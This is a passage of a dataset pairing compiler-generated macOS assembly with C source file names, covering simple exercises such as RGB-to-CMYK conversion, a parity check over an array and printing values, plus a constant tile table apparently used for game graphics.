ldur w0, [x29, #-4]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Please enter the RGB color values separated by <space>: "
l_.str.1: ; @.str.1
.asciz "%f %f %f"
l_.str.2: ; @.str.2
.asciz "C: %f M: %f Y: %f K: %f"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI0_0:
.quad 0x406fe00000000000 ## double 255
.section __TEXT,__literal4,4byte_literals
.p2align 2
LCPI0_1:
.long 0x3f800000 ## float 1
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
leaq -16(%rbp), %rcx
movb $0, %al
callq _scanf
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movsd LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -8(%rbp)
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movsd LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -12(%rbp)
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movsd LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -16(%rbp)
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_4
jp LBB0_4
## %bb.1:
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_4
jp LBB0_4
## %bb.2:
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
jne LBB0_4
jp LBB0_4
## %bb.3:
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -36(%rbp)
xorps %xmm0, %xmm0
movss %xmm0, -24(%rbp)
xorps %xmm0, %xmm0
movss %xmm0, -28(%rbp)
xorps %xmm0, %xmm0
movss %xmm0, -32(%rbp)
movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -28(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
movss -32(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero
cvtss2sd %xmm2, %xmm2
movss -36(%rbp), %xmm3 ## xmm3 = mem[0],zero,zero,zero
cvtss2sd %xmm3, %xmm3
leaq L_.str.2(%rip), %rdi
movb $4, %al
callq _printf
movl $0, -4(%rbp)
jmp LBB0_16
LBB0_4:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -12(%rbp), %xmm0
jb LBB0_7
## %bb.5:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -16(%rbp), %xmm0
jb LBB0_7
## %bb.6:
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -20(%rbp)
jmp LBB0_15
LBB0_7:
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -12(%rbp), %xmm0
jb LBB0_10
## %bb.8:
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -8(%rbp), %xmm0
jb LBB0_10
## %bb.9:
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -20(%rbp)
jmp LBB0_14
LBB0_10:
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -16(%rbp), %xmm0
jb LBB0_13
## %bb.11:
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -8(%rbp), %xmm0
jb LBB0_13
## %bb.12:
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -20(%rbp)
LBB0_13:
jmp LBB0_14
LBB0_14:
jmp LBB0_15
LBB0_15:
movss -20(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -8(%rbp), %xmm0
divss -20(%rbp), %xmm0
movss %xmm0, -24(%rbp)
movss -20(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -12(%rbp), %xmm0
divss -20(%rbp), %xmm0
movss %xmm0, -28(%rbp)
movss -20(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -16(%rbp), %xmm0
divss -20(%rbp), %xmm0
movss %xmm0, -32(%rbp)
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -20(%rbp), %xmm0
movss %xmm0, -36(%rbp)
movss -24(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -28(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
movss -32(%rbp), %xmm2 ## xmm2 = mem[0],zero,zero,zero
cvtss2sd %xmm2, %xmm2
movss -36(%rbp), %xmm3 ## xmm3 = mem[0],zero,zero,zero
cvtss2sd %xmm3, %xmm3
leaq L_.str.2(%rip), %rdi
movb $4, %al
callq _printf
LBB0_16:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Please enter the RGB color values separated by <space>: "
L_.str.1: ## @.str.1
.asciz "%f %f %f"
L_.str.2: ## @.str.2
.asciz "C: %f M: %f Y: %f K: %f"
.subsections_via_symbols
| the_stack_data/86481.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _values@GOTPAGE
ldr x8, [x8, _values@GOTPAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
stur wzr, [x29, #-4]
mov x9, sp
sub x8, x29, #16
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
stur wzr, [x29, #-8]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-8]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldursw x9, [x29, #-8]
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_1
LBB0_4:
stur wzr, [x29, #-8]
b LBB0_5
LBB0_5: ; =>This Loop Header: Depth=1
; Child Loop BB0_7 Depth 2
ldur w8, [x29, #-8]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_17
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
mov w8, #1
stur w8, [x29, #-20]
stur wzr, [x29, #-12]
b LBB0_7
LBB0_7: ; Parent Loop BB0_5 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_13
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=2
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=2
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldursw x8, [x29, #-8]
ldr w8, [x9, x8, lsl #2]
ldursw x10, [x29, #-12]
ldr w9, [x9, x10, lsl #2]
subs w0, w8, w9
bl _abs
mov w9, #2
sdiv w8, w0, w9
mul w8, w8, w9
subs w8, w0, w8
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_5 Depth=1
stur wzr, [x29, #-20]
b LBB0_13
LBB0_11: ; in Loop: Header=BB0_7 Depth=2
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_7 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_7
LBB0_13: ; in Loop: Header=BB0_5 Depth=1
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14:
ldur w8, [x29, #-8]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_17
LBB0_15: ; in Loop: Header=BB0_5 Depth=1
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_5 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB0_5
LBB0_17:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
.comm _values,404,2 ; @values
l_.str.1: ; @.str.1
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq -16(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -8(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -8(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -8(%rbp), %rax
movq _values@GOTPCREL(%rip), %rsi
shlq $2, %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -8(%rbp)
LBB0_5: ## =>This Loop Header: Depth=1
## Child Loop BB0_7 Depth 2
movl -8(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_17
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movl $1, -20(%rbp)
movl $0, -12(%rbp)
LBB0_7: ## Parent Loop BB0_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_13
## %bb.8: ## in Loop: Header=BB0_7 Depth=2
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
je LBB0_11
## %bb.9: ## in Loop: Header=BB0_7 Depth=2
movslq -8(%rbp), %rcx
movq _values@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %edi
movslq -12(%rbp), %rcx
movq _values@GOTPCREL(%rip), %rax
subl (%rax,%rcx,4), %edi
callq _abs
movl $2, %ecx
cltd
idivl %ecx
cmpl $0, %edx
jne LBB0_11
## %bb.10: ## in Loop: Header=BB0_5 Depth=1
movl $0, -20(%rbp)
jmp LBB0_13
LBB0_11: ## in Loop: Header=BB0_7 Depth=2
jmp LBB0_12
LBB0_12: ## in Loop: Header=BB0_7 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_7
LBB0_13: ## in Loop: Header=BB0_5 Depth=1
cmpl $0, -20(%rbp)
je LBB0_15
## %bb.14:
movl -8(%rbp), %esi
addl $1, %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_17
LBB0_15: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_16
LBB0_16: ## in Loop: Header=BB0_5 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB0_5
LBB0_17:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
.comm _values,404,4 ## @values
L_.str.1: ## @.str.1
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/156393951.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
sturb wzr, [x29, #-9]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldurb w8, [x29, #-9]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_7
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
subs w8, w8, #1
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldurb w10, [x29, #-9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_5
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldurb w11, [x29, #-9]
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x11
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldurb w8, [x29, #-9]
add w8, w8, #1
sturb w8, [x29, #-9]
b LBB0_1
LBB0_7:
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "X[%hhu] = 1\n"
l_.str.2: ; @.str.2
.asciz "X[%hhu] = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movb $0, -9(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movzbl -9(%rbp), %eax
cmpl $10, %eax
jge LBB0_7
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $1, -8(%rbp)
jge LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movzbl -9(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_5
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movzbl -9(%rbp), %esi
movl -8(%rbp), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_6
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
movb -9(%rbp), %al
addb $1, %al
movb %al, -9(%rbp)
jmp LBB0_1
LBB0_7:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "X[%hhu] = 1\n"
L_.str.2: ## @.str.2
.asciz "X[%hhu] = %d\n"
.subsections_via_symbols
| the_stack_data/105601.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__const
.globl _Main_Scene_BackgroundTiles ; @Main_Scene_BackgroundTiles
.p2align 2
_Main_Scene_BackgroundTiles:
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3854 ; 0xf0e
.short 0 ; 0x0
.short 0 ; 0x0
.short 3584 ; 0xe00
.short 30064 ; 0x7570
.short 0 ; 0x0
.short 0 ; 0x0
.short 28686 ; 0x700e
.short 30840 ; 0x7878
.short 0 ; 0x0
.short 0 ; 0x0
.short 38927 ; 0x980f
.short 29298 ; 0x7272
.short 0 ; 0x0
.short 0 ; 0x0
.short 38927 ; 0x980f
.short 29298 ; 0x7272
.short 0 ; 0x0
.short 0 ; 0x0
.short 28686 ; 0x700e
.short 29304 ; 0x7278
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 3599 ; 0xe0f
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 28789 ; 0x7075
.short 14 ; 0xe
.short 0 ; 0x0
.short 0 ; 0x0
.short 30840 ; 0x7878
.short 3670 ; 0xe56
.short 0 ; 0x0
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 3954 ; 0xf72
.short 0 ; 0x0
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 3954 ; 0xf72
.short 0 ; 0x0
.short 0 ; 0x0
.short 29298 ; 0x7272
.short 3670 ; 0xe56
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 256 ; 0x100
.short 42410 ; 0xa5aa
.short 42662 ; 0xa6a6
.short 42662 ; 0xa6a6
.short 35329 ; 0x8a01
.short 42916 ; 0xa7a4
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 43522 ; 0xaa02
.short 42889 ; 0xa789
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 43522 ; 0xaa02
.short 42889 ; 0xa789
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 43521 ; 0xaa01
.short 43401 ; 0xa989
.short 43177 ; 0xa8a9
.short 43433 ; 0xa9a9
.short 36353 ; 0x8e01
.short 31657 ; 0x7ba9
.short 44411 ; 0xad7b
.short 31611 ; 0x7b7b
.short 36353 ; 0x8e01
.short 46171 ; 0xb45b
.short 23476 ; 0x5bb4
.short 46260 ; 0xb4b4
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 42662 ; 0xa6a6
.short 52139 ; 0xcbab
.short 43979 ; 0xabcb
.short 1 ; 0x1
.short 42919 ; 0xa7a7
.short 52903 ; 0xcea7
.short 45016 ; 0xafd8
.short 906 ; 0x38a
.short 42919 ; 0xa7a7
.short 44199 ; 0xaca7
.short 55503 ; 0xd8cf
.short 937 ; 0x3a9
.short 42919 ; 0xa7a7
.short 42919 ; 0xa7a7
.short 53164 ; 0xcfac
.short 937 ; 0x3a9
.short 43433 ; 0xa9a9
.short 43433 ; 0xa9a9
.short 44201 ; 0xaca9
.short 7081 ; 0x1ba9
.short 31611 ; 0x7b7b
.short 31611 ; 0x7b7b
.short 43387 ; 0xa97b
.short 7081 ; 0x1ba9
.short 46260 ; 0xb4b4
.short 46260 ; 0xb4b4
.short 23220 ; 0x5ab4
.short 7081 ; 0x1ba9
.short 0 ; 0x0
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 0 ; 0x0
.short 55041 ; 0xd701
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 256 ; 0x100
.short 56023 ; 0xdad7
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 256 ; 0x100
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 256 ; 0x100
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55041 ; 0xd701
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 52483 ; 0xcd03
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 52483 ; 0xcd03
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 0 ; 0x0
.short 56026 ; 0xdada
.short 52685 ; 0xcdcd
.short 402 ; 0x192
.short 0 ; 0x0
.short 56026 ; 0xdada
.short 52442 ; 0xccda
.short 37580 ; 0x92cc
.short 1 ; 0x1
.short 56026 ; 0xdada
.short 52442 ; 0xccda
.short 41420 ; 0xa1cc
.short 1 ; 0x1
.short 56026 ; 0xdada
.short 52442 ; 0xccda
.short 41420 ; 0xa1cc
.short 1 ; 0x1
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 52428 ; 0xcccc
.short 402 ; 0x192
.short 986 ; 0x3da
.short 56013 ; 0xdacd
.short 52428 ; 0xcccc
.short 417 ; 0x1a1
.short 986 ; 0x3da
.short 56013 ; 0xdacd
.short 52428 ; 0xcccc
.short 417 ; 0x1a1
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 51201 ; 0xc801
.short 403 ; 0x193
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
